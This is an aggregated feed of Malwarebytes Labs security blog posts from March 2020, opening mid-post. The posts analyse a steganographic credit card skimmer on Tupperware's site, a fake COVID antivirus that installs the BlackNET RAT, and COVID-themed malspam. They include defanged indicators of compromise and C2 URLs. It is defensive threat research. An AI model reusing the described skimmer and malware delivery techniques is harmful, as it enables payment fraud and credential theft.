But it can be done. We know what consumer-grade tools look like. And we know what cybersecurity challenges businesses face. The task before us as an industry is to fit these two puzzle pieces together. It will require greater attention to user interface design and highly-automated threat detection. It will call for combining technical excellence with human intuition. But it can be done.

The consumerization of IT security—consumer-grade ease of use, plus enterprise security expertise—can meet the cybersecurity challenges of today.

The post Consumerization: a better way to answer cybersecurity challenges appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Criminals hack Tupperware website with credit card skimmer

Malware Bytes Security - Wed, 03/25/2020 - 11:00am

On March 20, Malwarebytes identified a targeted cyberattack against household brand Tupperware and its associated websites that is still active today. We attempted to alert Tupperware immediately after our discovery, but none of our calls or emails were answered.

Threat actors compromised the official tupperware[.]com site—which averages close to 1 million monthly visits—as well as a few of its localized versions by hiding malicious code within an image file that activates a fraudulent payment form during the checkout process. This form collects customer payment data via a digital credit card skimmer and passes it on to the cybercriminals with Tupperware shoppers none-the-wiser.

Digital credit card skimmers, also known as web skimmers, continue to be one of the top web threats we monitor at Malwarebytes. For the past several years, a number of criminals (usually tied to organized Magecart groups) have been actively compromising e-commerce platforms with the goal of stealing payment data from unaware shoppers.

In light of the COVID-19 outbreak, the volume of people shopping online has dramatically increased, and there is little doubt that a larger number of transactions will be impacted by credit card skimmers moving forward.

There was a fair amount of work put into the Tupperware compromise to integrate the credit card skimmer seamlessly and stay undetected for as long as possible. Below, we walk you through how we discovered the skimmer, and analyze the threat and its attack techniques.

Rogue iframe container

During one of our web crawls, we identified a suspicious-looking iframe loaded from deskofhelp[.]com when visiting the checkout page at tupperware[.]com. This iframe is responsible for displaying the payment form fields presented to online shoppers.

There are a few red flags with this domain name:

  • It was created on March 9, and as we see with many fraudulent websites, newly-registered domains are often used by threat actors prior to a new campaign.
  • It is registered to elbadtoy@yandex[.]ru, an email address with Russian provider Yandex. This seems at odds for a payment form on a US-branded website.
  • It is hosted on a server at 5.2.78[.]19 alongside a number of phishing domains.

Interestingly, if you were to inspect the checkout page’s HTML source code, you would not see this malicious iframe. That’s because it is loaded dynamically in the Document Object Model (DOM) only.

One way to reveal this iframe is to right click anywhere within the payment form and choose “View frame source” (in Google Chrome). It will open up a new tab showing the content loaded by deskofhelp[.]com.

There is one small flaw in the integration of the credit card skimmer: The attackers didn’t carefully consider (or perhaps didn’t care about) how the malicious form should look on localized pages. For example, the Spanish version of the Tupperware site is written in Spanish, but the rogue payment form is still in English:

Below is the legitimate form (in Spanish):

More trickery to dupe shoppers

The criminals devised their skimmer attack so that shoppers first enter their data into the rogue iframe and are then immediately shown an error, disguised as a session time-out.

This allows the threat actors to reload the page with the legitimate payment form. Victims will enter their information a second time, but by then, the data theft has already happened.

Upon close inspection, we see the fraudsters even copied the session time-out message from CyberSource, the payment platform used by Tupperware. The legitimate payment form from CyberSource includes a security feature where, if a user is inactive after a certain amount of time, the payment form is cancelled and a session time-out message appears. Note: we contacted Visa who owns CyberSource to report this abuse as well.

You can still spot a slight difference between the legitimate time-out page (loaded from and the fake one. The former contains the text “Session timed out” in bold, black text while the latter features gray text that is both smaller and a different font.

The stolen data is sent to the same domain used to host the rogue iframe. Fraudsters are now in possession of the following data from unaware shoppers:

  • First and last name
  • Billing address
  • Telephone number
  • Credit card number
  • Credit card expiry date
  • Credit card CVV
Another case of steganography

In order to identify how the card skimmer attack worked, we needed to go back a few steps and examine all web resources loaded by tupperware[.]com, including image files.

This process can be time-consuming but is necessary to figure how the rogue iframe is injected. We found a snippet of code on the homepage that dynamically calls an FAQ icon from Tupperware’s server, which is loaded silently (and is therefore not visible to shoppers). The image contains a malformed PNG file that is quite suspicious.

Looking at this file using a hex editor, we can see the different sections of the image. While IEND should mark the end of the file, after some blank spaces, there is a large JavaScript blurb that includes several parts which have been encoded.

At this point, we did not yet know what the code was meant to do, but we could tell it was some kind of steganographic attack, a technique we observed in web skimmers late last year. One way to find out is to debug the JavaScript code, despite the malware author’s attempts to crash the debugger.

Once we got past that hurdle, we could finally confirm that the code embedded in this PNG image is responsible for loading the rogue iframe at the checkout page:

There is additional code so that the skimmer is loaded seamlessly and covertly. The threat actors are actually hiding the legitimate, sandboxed payment iframe by referencing its ID and using the {display:none} setting.

The fake payment form is also referenced so that it fits in its place and looks exactly the same (except on localized versions). This required some effort from the fraudsters to mimic the same style and functionality.

The domain deskofhelp[.]com contains a set of JavaScript, CSS, and image files to that effect, and of course, the code to check for and exfiltrate the payment data.

Site compromise

One question we haven’t answered yet is how the malicious PNG image is loaded. We know that the embedded JavaScript loads code dynamically in the DOM, but something needs to call that PNG file first, and that would have to be visible in the HTML source code.

To make identification slightly more difficult, the code has been broken down. However, we can reconstruct it and see how the URL loading the PNG file is built by using string concatenation, for instance.

This code is helpful to determine a time frame for when the website compromise happened. Although we don’t have archives, we know from external sources, such as this WayBackMachine crawl, that the code was not present in February. The hack most likely happened after March 9, which is when the malicious domain deskofhelp[.]com became active.

We do not know exactly how Tupperware got hacked, but a scan via Sucuri’s SiteCheck shows that they may be running an outdated version of the Magento Enterprise software.

Disclosure and protection

Upon identifying this compromise, we called Tupperware on the phone several times, and also sent messages via email, Twitter, and LinkedIn. However, at time of publication, we still have not heard back from the company and the site remains compromised.

Malwarebytes users are protected against this attack, including those running our free Browser Guard extension.

We will update this blog if we receive any additional information.

Indicators of compromise

Malicious PNG file hosted on Tupperware sites:

tupperware[.]com/media/wysiwyg/faq_icon.png tupperware[.]ca/media/wysiwyg/faq_icon.png es.tupperware[.]com/media/wysiwyg/faq_icon.png

SHA-256 of malicious PNG


Skimmer infrastructure

deskofhelp[.]com 5.2.78[.]19

The post Criminals hack Tupperware website with credit card skimmer appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Windows 7 is EOL: What next?

Malware Bytes Security - Tue, 03/24/2020 - 1:37pm

End-of-life (EOL) is an expression commonly used by software vendors to indicate that a product or version of a product has reached the end of usefulness in the eyes of the vendor. Many companies, including Microsoft, announce the EOL dates for their products far in advance.

Every Windows product has a lifecycle. The lifecycle begins when a product is released and ends when it’s no longer supported. Knowing key dates in this lifecycle helps you make informed decisions about when to update, upgrade, or make other changes to your software.

Windows 7 EOL

For those that were unaware, Windows 7 reached EOL on January 14, 2020. When a Windows Operating System (OS) hits the end of its lifecycle, it no longer receives updates from Microsoft.

That means Microsoft no longer supports users of Windows 7, and Windows 7 will no longer receive updates, although Microsoft has been known to make exceptions for urgent vulnerabilities. And while organizations may be able to extend support by paying for it, home users are advised to move on to more modern operating systems.

Or as Microsoft puts it:

“Now is the time to shift to Windows 10. Get robust security features, enhanced performance, and flexible management to keep your employees productive and secure.”

And of course, they have a point. If cybercriminals discover a vulnerability in Windows 7, there is no guarantee that this vulnerability will be patched by Microsoft. And while there is still a large Windows 7 user base, it pays off for the cybercriminals to weaponize such a vulnerability and use it to their advantage. Keep in mind that most of the exploit kits active in the wild focus on older vulnerabilities, which will not be patched if you are using EOL software.

Is Windows 10 more secure?

While the call to move on to Windows 10 by Microsoft makes it sound mighty safe, what exactly are these security features that Windows 10 has over Windows 7? We know it’ll be supported by Microsoft, and therefore any known vulnerabilities will be patched. Its other security features are as follows:

  • Windows 10 includes Windows Defender by default, which provides a baseline level of antivirus protection.
  • SmartScreen is a reputation system that tries to block harmful and unknown file downloads.
  • Windows 10 includes Microsoft Edge instead of Internet Explorer, which is targeted most often by exploits.

On the downside, you might argue that Windows 10 has a lot of new features that tend to come with new problems and risks. However, Windows 10 has been around for a while now, so the worst problems should have been tackled.

However, we want to stress: Moving on to a new operating system, while safer than sticking with a legacy system, is no substitute for a strong security solution. Even Windows 10 machines need anti-malware protection.

According to a spokesperson from our malware removal staff, the correlation between browser use and malware is actually higher than the one between OS version and malware. Meaning: The browser you use has a much bigger impact on the likelihood of being infected than the OS that you use. So even if you switch over to Windows 10 but keep using Google Chrome, you can still be easily infected. Now that Windows 10 has switched over to Edge, many cybercriminals are focusing on exploits for Google Chrome, one of the most popular browsers today.

Other operating systems

To avoid potential infection—or because they’re looking for a change— some Windows users might consider moving to entirely different operating systems, such as Mac or Linux. But layering up built-in protection with security software is important, even if you decide to switch.

For example, the long-standing myth that Macs are safer than Windows systems has been proven wrong. As you can read in our 2020 State of Malware Report, Mac threats increased exponentially in comparison to those against Windows PCs in 2019, with nearly double the threats per Mac endpoint than Windows. And while Macs don’t get viruses, Mac adware is more sophisticated and dangerous than traditional Mac malware.

In some cases, people may consider switching to a Chromebook, which is certainly a cheaper option if it offers enough capabilities to replace your current Windows desktop or laptop. But even Chromebooks can—and do—get infected.

We don’t expect a lot of users to switch to a more hardcore Linux OS, since they might expect a huge learning curve (another misconception) or their favorite software is not available (unfortunately, not a myth). However, even if they do, Linux OSes are not free from malware. They’re simply attacked less often because cybercriminals understand their user base isn’t as large (and therefore, their payday isn’t as big).

Windows 7 user base

Currently over 23 percent of Windows users worldwide are still on Windows 7, and only 69 percent have already switched to Windows 10. The rest are using the less popular Windows 8 or versions of Windows that have gone EOL long before Windows 7.

Oddly enough, the percentage of Windows 7 users has hardly decreased after reaching the EOL date in January (from roughly 24 percent to 23 percent). With this huge amount of potentially unpatched systems still active in the market, any exploitable vulnerability will result in a widespread disaster.

Would WannaCry have had such an enormous impact if Windows XP and Windows Server 2003 had been abandoned before it spread? We will never know. What we do know that Windows 8 and 10 did not need to be patched for the vulnerability that was used to spread WannaCry. They were not contributing to the choir of systems trying to infect their neighbors. Emergency patches were released for several older Windows versions, including Windows 7. At the time, Windows 7 was still supported.

We got you

It is not our habit to promote our own products in our blogs, but we wanted to let you know that whichever OS (and browser) you chose next, we’ve your back. As a demonstration, here is a list of the available Malwarebytes consumer versions created to protect our users:

Malwarebytes for Windows

Malwarebytes for Mac

Malwarebytes for Chromebook

Malwarebytes for Android

Malwarebytes for iOS

Malwarebytes Browser Guard (for Firefox and Chrome)

Download links, pricing, and more information, such as a list of our business offerings and customer reviews, can be found on our pricing page.

Stay safe, everyone!

The post Windows 7 is EOL: What next? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Fake “Corona Antivirus” distributes BlackNET remote administration tool

Malware Bytes Security - Mon, 03/23/2020 - 3:35pm

Scammers and malware authors are taking advantage of the coronavirus crisis in full swing. We have seen a number of spam campaigns using COVID-19 as a lure to trick people into installing a variety of malware, but especially data stealers.

As more of us work from home, the need to secure your computer, especially if you are connecting to your company’s network, becomes more important. However, you should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point.

Corona antivirus: 100% fake

The latest scam we found is a website (antivirus-covid19[.]site) advertising “Corona Antivirus -World’s best protection.” That’s right, scammers are trying to get you to install a digital antivirus that supposedly protects against the actual COVID-19 virus infecting people across the world.

To add to the nonsense, the site goes on by adding:

Our scientists from Harvard University have been working on a special AI development to combat the virus using a windows app. Your PC actively protects you against the Coronaviruses (Cov) while the app is running.

Infected victims added to BlackNET RAT

Upon installing this application, your computer will be infected with malware. The file, packed with the commercial packer Themida turns your PC into a bot ready to receive commands:

hxxps[://]instaboom-hello[.]site//connection[.]php?data=[removed] hxxps[://]instaboom-hello[.]site//getCommand[.]php?[removed] hxxps[://]instaboom-hello[.]site//receive[.]php?command=[removed]

The command and control server hosted at instaboom-hello[.]site reveals the control panel for the BlackNET botnet.

The full source code for this toolkit was published on GitHub a month ago. Some of its features include:

  • Deploying DDOS attacks
  • Taking screenshots
  • Stealing Firefox cookies
  • Stealing saved passwords
  • Implementing a keylogger
  • Executing scripts
  • Stealing Bitcoin wallets
Choose the right protection

During this period, it is important to stay safe both at home and online. The number of scams we have seen during these past few weeks shows that criminals will take advantage of any situation, no matter how dire it is.

We recommend that you keep your computer up to date and use extra caution when downloading new programs. Beware of instant notifications and other messages, even if they appear to come from friends.

Malwarebytes users were already protected even though we had not seen this malware sample before, thanks to our Machine learning engine.

We also informed CloudFlare since the threat actors were abusing their service and they took immediate action to flag this website as a phish.

Indicators of compromise

Malicious site


Bogus corona antivirus

antivirus-covid19[.]site/update.exe 146dd15ab549f6a0691c3a728602ce283825b361aa825521252c94e4a8bd94b4

C2 panel


The post Fake “Corona Antivirus” distributes BlackNET remote administration tool appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (March 16 – 22)

Malware Bytes Security - Mon, 03/23/2020 - 12:44pm

Last week on Malwarebytes Labs, we concluded our series on child identity theft. We also looked into threat actors and campaigns that ride the COVID-19 train, namely the criminal group APT36 and threat actors purporting to be the World Health Organization (WHO) but instead spreading malware. Lastly, we have tips for those who are working at home to stay secure while social distancing.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (March 16 – 22) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Coronavirus scams, found and explained

Malware Bytes Security - Fri, 03/20/2020 - 11:00am

Coronavirus has changed the face of the world, restricting countless individuals from dining at restaurants, working from cafes, and visiting their loved ones. But for cybercriminals, this global pandemic is expanding their horizons.

In the past week, Malwarebytes discovered multiple email scams that prey on the fear, uncertainty, and confusion regarding COVID-19, the illness caused by the novel coronavirus. With no vaccine yet developed, and with much of the world undergoing intense social distancing measures and near-total lockdown procedures, threat actors are flooding cyberspace with emailed promises of health tips, protective diets, and, most dangerously, cures. Attached to threat actors’ emails are a variety of fraudulent e-books, informational packets, and missed invoices that hide a series of keyloggers, ransomware, and data stealers.

The problem expands beyond pure phishing scams.

On March 14, Twitter user @dustyfresh published a web tracker that found 3,600 coronavirus- and COVID-19-related hostnames that sprung up in just 24 hours.

On March 17, security researcher and python developer @sshell_ built a tool, hosted by the team at ThugCrowd, that provides real-time scans for potentially malicious, coronavirus-related domains. Just click the link and watch possible scam sites get registered every minute.

Further, RiskIQ reportedly tracked more than 13,000 suspicious, coronavirus-related domains last weekend, and more than 35,000 domains the next day, too.

Much of these numbers mean nothing without real, useful examples, though. Yes, coronavirus scams and scam sites are out there, but what do they look like, and how do they work? We’re here to explain.

Here are some of the many email scams that Malwarebytes spotted in the wild, with full details on what they say, what they’re lying about, and what types of malware they’re trying to install on your machines. The good news? Malwarebytes protects against every threat described.

Impersonating the World Health Organization

Earlier this week, we found an email phishing campaign sent by threat actors impersonating the World Health Organization (WHO), one of the premier scientific resources on COVID-19. That campaign, which pushed a fake e-book to victims, delivered malicious code for a downloader called GuLoader. That download is just the first step in a more complex scheme.

As we wrote:

“GuLoader is used to load the real payload, an information-stealing Trojan called FormBook, stored in encoded format on Google Drive. Formbook is one of the most popular info-stealers, thanks to its simplicity and its wide range of capabilities, including swiping content from the Windows clipboard, keylogging, and stealing browser data. Stolen data is sent back to a command and control server maintained by the threat actors.”

Unfortunately, this GuLoader scam is just one of many in which threat actors posed as WHO professionals as a way to trick victims into downloading malicious attachments.

On March 18, we uncovered an email campaign that pushed victims into unwittingly downloading an invasive keylogger called Agent Tesla. The keylogger, which experienced a reported 100 percent increase in activity across three months in 2018, can steal a variety of sensitive data.

As cybersecurity researchers at LastLine wrote: “Acting as a fully-functional information stealer, [Agent Tesla] is capable of extracting credentials from different browsers, mail, and FTP clients. It logs keys and clipboards data, captures screen and video, and performs form-grabbing (Instagram, Twitter, Gmail, Facebook, etc.) attacks.”

The Agent Tesla campaign that we tracked on Wednesday involved an email with the subject line: Covid19″ Latest Tips to stay Immune to Virus !!

The email came to individuals’ inboxes allegedly from the WHO, with a sender email address of “” Notice that the sender’s email address ends with “.com” when legitimate WHO email addresses instead end with “.int.”

The email alleges to include a PDF file about “various diets and tips to keep us safe from being effected with the virus.” It is signed by a “Dr. Sarah Hopkins,” a supposed media relations consultant for the WHO.

A quick online search reveals that the WHO has a public website for contacting its media relations representatives, and that none of those representatives is named Sarah Hopkins. Also, note how “Dr. Hopkins” has a phone number that doesn’t work, at +1 470 59828. Calling the number from a US-based phone resulted in an error message from the mobile service provider.

Interestingly, the above scam is just one example of an email campaign that both impersonates the WHO and attempts to deliver Agent Tesla.

On the same day we found the above-mentioned Agent Tesla scam, we found another that mirrored its tactics and payload.

The second Agent Tesla scam arrives in individuals’ inbox with the email subject line “World Health Organization/Let’s fight Corona Virus together”

Already, savvy readers should spot a flaw. The unnecessary space placed between the words “Corona” and “Virus” mirrors a similar grammatical error, an unnecessary hyphen, in the GuLoader scam we covered on Malwarebytes Labs this week.

The entire body of the email reads, in verbatim:

We realise that the spread of the COVID-19 coronavirus may leave you feeling concerned, so we want to take a moment to reassure you that your safety and well-being remains our absolutely top priority.

Please be assured that our teams are working hard and we are monitoring the situation and developments closely with the health and governmental authorities of all countries we operate in. See attached WHO vital information to stay healthy.

we personally thank you for your understanding and assure you that we will do our utmost to limit disruptions this event brings to your travel plans while keeping your well-being our top priority.

This campaign attempts to trick victims into downloading a fake informational packet on coronavirus, with the file title “COVID-19 WHO RECOMMENDED V.gz.” Instead of trustworthy information, victims are infected with Agent Tesla.

While this campaign does not include as many smoke-and-mirror tactics, such as a fake media representative and a fake phone number, it can still do serious damage simply by stoking the fears surrounding COVID-19.

Finally, we found a possible WHO impersonator pushing the NetWire Remote Access Trojan (RAT). RATS can allow hackers to gain unauthorized access to a machine from a remote location.

As we explain in our Threat Center profile on RATs, these types of Trojan can have devastating effects:

If Remote Access Trojan programs are found on a system, it should be assumed that any personal information (which has been accessed on the infected machine) has been compromised. Users should immediately update all usernames and passwords from a clean computer, and notify the appropriate system administrator of the potential compromise. Monitor credit reports and bank statements carefully over the following months to spot any suspicious activity on financial accounts.

The NetWire campaign included a slapdash combo of a strange email address, an official-looking WHO logo inside the email’s body, and plenty of typos.

Sent from “Dr. Stella Chungong” using the email address “,” the email subject line is “SAFETY COVID-19 (Coronavirus Virus) AWARENESS – Safety Measures.” The body of the text reads:

To whom it may concern,

Go through the attac=ed document on safety measures regarding the spreading of Corona-virus.

Common symptoms include fever, cough, shortness in breath, and breathi=g difficulties.


Dr. Stella Chungong

Specialist whuan=virus-advisory

The litany of misplaced “=” characters should immediately raise red flags for potential victims. These common mistakes show up in a wide variety of malicious email campaigns, as threat actors seem to operate under the mindset of “Send first, spellcheck later.”

Other malspam campaigns

Most of the coronavirus scams we spotted online are examples of malspam—malicious spam email campaigns that cross the line from phony, snake-oil salesmanship into downright nefarious malware delivery.

Here are a number of malspam campaigns that our threat intelligence team found since March 15.

First up is this strange email titled “RE: Due to outbreak ofCoronavirus,” which arrives to users’ inboxes from the vague sender “Marketing,” with an email address of “” A Google search reveals that appears to point to Boresha Credit Service Limited, a debt collector based in Kenya.

The short email reads:


We have been instructed by your customer to make this transfer to you.

we are unable to process your payment as the SWIFT CODE in your bank account information is wrong,

please see that enclosed invoice and correct SWIFT CODE so we can remit payment ASAP before bank close.”

Again, scrutinizing the details of the email reveals holes in its authenticity.

The email is signed by “Rafhana Khan,” a supposed “Admin Executive” from the United Arab Emirates. The email sender includes this extra bit of info that leads us nowhere: TRN No. 100269864300003.

What is a TRN, and why would it be included? At best, we can assume this is the individual’s “tax registration number,” but think about the last time anyone signed an email with the US equivalent—their tax identification number. You’ve probably never seen that before, right? That’s because tax IDs are meant to be private, and not shared in email signatures. We can assume that the threat actors included this bogus bit of info to add some imaginary credibility. Really, it’s just nonsense.

The email’s attached invoice, once again, pushes GuLoader to the potential victim.

Another spotted malspam example pushes neither GuLoader or Agent Telsa. Instead, it tries to trick users into downloading a malware called HawkEye, a credential stealer that has plagued users since at least 2013.

According to the cybersecurity news outlet Security Affairs, HawkEye “is offered for sale on various hacking forums as a keylogger and stealer, [and] it allows to monitor systems and exfiltrate information.”

The HawkEye scam comes packaged in an email with the subject line “CORONA VIRUS CURE FOR CHINA,ITALY” from the alleged sender “DR JINS (CORONA VIRUS).” Again, potential victims receive a short message. The entire email body reads:

Dear Sir/Ma,

Kindly read the attached file for your quick remedy on CORONA VIRUS.

The email sender lists their place of work as the non-existent, misspelled RESEARCH HOSPITAL ISREAL at the address NO 29 JERUSALEM STREET, P.O.C 80067, ISREAL.

On March 15, we also found an email scam targeting victims in the UK and pushing, yet again, GuLoader. This time, threat actors promised updated statistics on the number of confirmed coronavirus cases in the United Kingdom.

The malicious email comes from the sender “PHE” with the email address, which, like one of the examples above, appears to come from Kenya.

Because threat actors have one, overplayed tactic in these types of campaigns—putting in low effort—the content of the email is simple and short. The email reads:

Latest figures from public health authorities on the spread of Covid-19 in the United Kingdom.

Find out how many cases have been reported near you.

There is no email signature, and not even a greeting. Talk about a lack of email etiquette.

Finally, we found another campaign on March 18 that targets Spanish-speaking victims in Spain. The email, titled “Vacuna COVID-19: prepare la vacuna en casa para usted y su familia para evitar COVID-19,” pushes GuLoader.

The email is signed by “Adriana Erico,” who offers no phone number, but does offer a fax number at 93 784 50 17. Unlike the fake phone number we tested above, we could not test the authenticity of this fax number, because the Bay Area is under a shelter-in-place order, and, truthfully, I don’t own a fax machine in my home.

Protect yourself

Threat actors are always looking for the next crisis to leverage for their own attacks. For them, coronavirus presents a near-perfect storm. Legitimate confusion about accurate confirmed cases, testing availability, and best practices during social distancing makes for a fearful public, hungry for answers anywhere.

Like we said the last time we looked at COVID-19 scams, the best places for information remain the WHO and the US Centers for Disease Control and Prevention (CDC).

You can find updated statistics about confirmed COVID-19 cases from the WHO’s daily, situation reports here.

You can also find information on coronavirus myths at the WHO’s Myth Busters webpage, along with its Q&A page.  

To help prevent the spread of the illness, remember, wash your hands for at least 20 seconds, refrain from touching your face, and practice social distancing by maintaining a distance of six feet from people not in your household.

This is difficult, this is new, and for many of us, it presents a life-altering shift. It’s important to consider that, right now, banding together as a global community is our best shot at beating this. That advice extends to the online world, too.

While coronavirus might have brought out the worst in cybercriminals, it’s also bringing out the best across the Internet. This week, a supposed “Covid19 Tracker App” infected countless users’ phones with ransomware, demanding victims pay $100 to unlock their devices or risk a complete deletion of their contacts, videos, and pictures. After news about the ransomware was posted on Reddit, a user decompiled the malicious app and posted the universal passcode to defeat the ransomware. The passcode was then shared on Twitter for everyone to use.

Stay safe, everyone.

The post Coronavirus scams, found and explained appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Security tips for working from home (WFH)

Malware Bytes Security - Thu, 03/19/2020 - 11:00am

Over the last decade, remote work and working from home has grown in popularity for many professionals. In fact, a 2018 study found more than 70 percent of global employees work remotely at least once per week. However, the coronavirus pandemic and resulting lockdown in many parts of the world have forced a large number of employees into unfamiliar territory—not just remote work, but full-time working from home (WFH).

Given these circumstances, we figured it would be useful to share some of the security tips we have for WFH, not just for IT teams who suddenly need to secure their entire remote workforce, but for individuals to take their own precautions.

I have been working remote for over five years now, from several locations and mostly WFH, so I dare say I can speak from personal experience.

WFH physical security

The first so-obvious-it’s-not-obvious tip is to make sure your work devices are physically safe, and that you avoid offering unauthorized views of confidential information. Here are a few ways to shore up physical security while WFH:

  • If you need to leave your home for supplies or other reasons, make sure your work devices are either shut down or locked—including any mobile phones you might use to check email or make work phone calls.
  • If you live with a roommate or young children, be sure to lock your computer even when you step away for just a bit. Don’t tempt your roommates or family members by leaving your work open. This is true even for the workplace, so it is imperative for WFH.
  • If you can’t carve out a separate work space in your home, be sure to collect your devices at the end of your workday and store them someplace out of sight. This will not only keep them from being accidentally opened or stolen, but will also help separating your work life from your home life.
System access

Perhaps your office network was so protected that little thought was given to restricting access to servers with sensitive data. Or perhaps you now have to work on your personal laptop—one that you didn’t think much about securing before coronavirus upended your life.

Either way, it’s time to start thinking about the ways to guard against unauthorized access. If you think cybercriminals (and regular criminals) will be sensitive to global events and refrain from attacking remote workers, sadly, you’d be mistaken.

  • Access to the your computer’s desktop should at least be password protected, and the password should be a strong one. If the system is stolen, this will keep the thief from easily accessing company information.
  • If office network permissions previously gave you unfettered access to work software, now you may be required to enter a variety of passwords to gain access. If your workplace doesn’t already offer a single sign-on service, consider using a password manager. It will be much more secure than a written list of passwords left on your desk.
  • Encryption also helps protect information on stolen or compromised computers. Check whether data encryption is active on your work machine. If you’re not sure, ask your IT department whether you have it, and if they think it’s necessary.
  • If you’re connecting your work computer to your home network, make sure you don’t make it visible to other computers in the network. If you have to add it to the HomeGroup, then make sure the option to share files is off.
Separate work and personal devices

Easier said that done, we know. Still, just as it’s important to carve out boundaries between work life and home life while WFH, the same is true of devices. Do you have a child being homeschooled now and turning in digital assignments? Are you ordering groceries and food online to avoid stores? Best not to cross those hairs with work.

While it may seem cumbersome to constantly switch back and forth between the two, do your best to at least keep your main work computer and your main home computer separate (if you have more than one such device). If you can do the same for your mobile devices—even better. The more programs and software you install, the more potential vulnerabilities you introduce.

  • Don’t pay your home bills on the same computer you compile work spreadsheets. You can not only create confusion for yourself, but also end up compromising your personal information when a cybercriminal was looking to breach your company.
  • Don’t send work-related emails from your private email address and vice versa. Not only does it look unprofessional, but you are weaving a web that might be hard to untangle once the normal office routine resumes.
  • Speaking of homeschooling, it’s especially important to keep your child’s digital curriculum separate from your work device. Both are huge targets for threat actors. Imagine their delight when they find they can not only plunder an organization’s network through an unsecured remote worker, but they can also collect highly valuable PII on young students, which garners a big pay day on the dark web.
Secure connections
  • Make sure you have access to your organization’s cloud infrastructure and can tunnel in through a VPN with encryption.
  • Secure your home Wi-Fi with a strong password, in case VPN isn’t an option or if it fails for some reason.
  • Access to the settings on your home router should be password protected as well. Be sure to change the default password it came with—no 12345, people!
Cybersecurity best practices

Other WFH security precautions may not be all that different from those you should be practicing in the office, but they are easy to forget when you are working in your own home environment. A few of the most important:

  • Be wary of phishing emails. There will be many going around trying to capitalize on fear related to the coronavirus, questions about isolation and its psychological impacts, or even pretending to offer advice or health information. Scan those emails with a sharp eye and do not open attachments unless they’re from a known, trusted source.
  • Related to phishing: I’m pretty sure we can expect to see a rise in Business Email Compromise (BEC) fraud. Your organization may be sending you many emails and missives about new workflows, processes, or reassurances to employees. Watch out for those disguising themselves as high-ranking employees and pay close attention to the actual email address of senders.
  • Beware of overexposure on social media, and try to maintain typical behavior and routine: Do you normally check social media on your phone during lunchtime? Do the same now. Once again, watch out for scams and misinformation, as criminals love using this medium to ensnare their victims.
Other security precautions

Not every organization was prepared for this scenario, so it’s only natural that some may not have the level of RemoteSec in place that others do. Make sure to get yourself up to speed with the guidelines that your organization has in place for remote work. Ask for directions if anything is unclear. Not everyone has the same level of tech savvy—the only stupid question is one that isn’t asked.

I have listed some of the questions you may need to have answered before you can rest assured that WFH is not going to be a security disaster. Here are some to consider:

  • When you are working remote for long periods, make sure you know who is responsible for updates. Are you supposed to keep everything up to date or can your IT department do it for you?
  • Your system may require additional security software now that it has left the safer environment of your organization’s network. Check with your IT department on whether you should install addition solutions: Will you need a security program for your Window PC or for your Mac (which was hit with twice as many threats as Windows computers in 2019)? If you’re using an Android device for work, should you download security software that can protect your phone? (iOS doesn’t allow outside antivirus vendors.)
  • How will data storage and backup work? Can you save and back up your local files to a corporate cloud solution? Find out which one they prefer you to use in your specific role.
On a different note

This is a big adjustment for many people. Your first few days of WFH may leave you irritated, uncomfortable, unmotivated, or just plain exhausted. Adding security tips to the list may just add to your fatigue right now. We understand. Take it a day at a time, a step at a time.

When working from home, find a comfortable working area where you can assume a healthy posture, minimize the distraction from others, and where your presence has the least impact on how others have to behave. Take breaks to stretch your legs, and give your eyes a rest. And if you enjoy WFH, now is the time to prove to your employer that it’s a viable option in the long run.

Stay safe, everyone! Now more than ever.

The post Security tips for working from home (WFH) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Cybercriminals impersonate World Health Organization to distribute fake coronavirus e-book

Malware Bytes Security - Wed, 03/18/2020 - 11:36am

The number of scams, threats, and malware campaigns taking advantage of public concern over the coronavirus is increasing each day. As a result, we’ve been actively monitoring emails within our spam honeypot to flag such threats and make sure our users are protected.

Yesterday, we observed a phishing campaign similar to malspam previously discovered by MalwareHunterTeam, which impersonates the World Health Organization (WHO) and promises the latest on “corona-virus.” Right off the bat, the incorrect use of a hyphen in “coronavirus” in the subject line could tip off users with a critical eye for grammar. However, since WHO are often touted as a trustworthy and authoritative resource, including by our own blog, many will be tempted to open the email.

In this particular campaign, threat actors use a fake e-book as a lure, claiming the “My Health E-book” includes complete research on the global pandemic, as well as guidance on how to protect children and businesses.

The criminals behind this scheme try to trick victims into opening the attachment, contained in a zip file, by offering teaser content within the body of the email, including:

Guidance to protect children and business centre;

This guidance provides critical considerations and practical checklists to keep Kids and business centre safe. It also advises national and local authorities on how to adapt and implement emergency plans for educational facilities.

Critical preparedness, readiness and response actions for COVID-19;

WHO has defined four transmission scenarios for COVID-19. My Health E-book describes the preparedness, readiness and response actions for each transmission scenario.

The email content goes on to tell readers that they can download and access the e-book from Windows computers only.

Instead, as soon as they execute the file inside the archive, malware will be downloaded onto their computers. As seen in the previous wave of spam, the malicious code is for a downloader called GuLoader.

GuLoader is used to load the real payload, an information-stealing Trojan called FormBook, stored in encoded format on Google Drive. Formbook is one of the most popular info-stealers, thanks to its simplicity and its wide range of capabilities, including swiping content from the Windows clipboard, keylogging, and stealing browser data. Stolen data is sent back to a command and control server maintained by the threat actors.

While the threat actors are improving on the campaign’s sophistication by building reputable-sounding content within the body of the email, a closer examination reveals small grammatical errors, such as:

You are now receiving this email because your life count as everyone lives count.

This combined with other minor formatting and grammar mistakes, as well as a mix-and-match selection of fonts make this clever phishing scheme, upon closer examination, a dud. Still, many have fallen for far more obvious ploys.

With a huge swatch of the population now confined to their homes but working remotely, the risk of infecting a highly-distributed network is increasing. That’s why it’s more important than ever to use a discerning eye when opening work or personal emails, as employee negligence is one of the top indicators for successful cyberattack/data breach.

Malwarebytes home and business customers were already protected against this malspam campaign and its associated payloads.

Indicators of compromise



FormBook URL[.]com/uc?export=download&id=1vljQdfYJV76IqjLYwk74NUvaJpYBamtE

The post Cybercriminals impersonate World Health Organization to distribute fake coronavirus e-book appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Child identity theft, part 2: How to reclaim your child’s identity

Malware Bytes Security - Tue, 03/17/2020 - 12:33pm

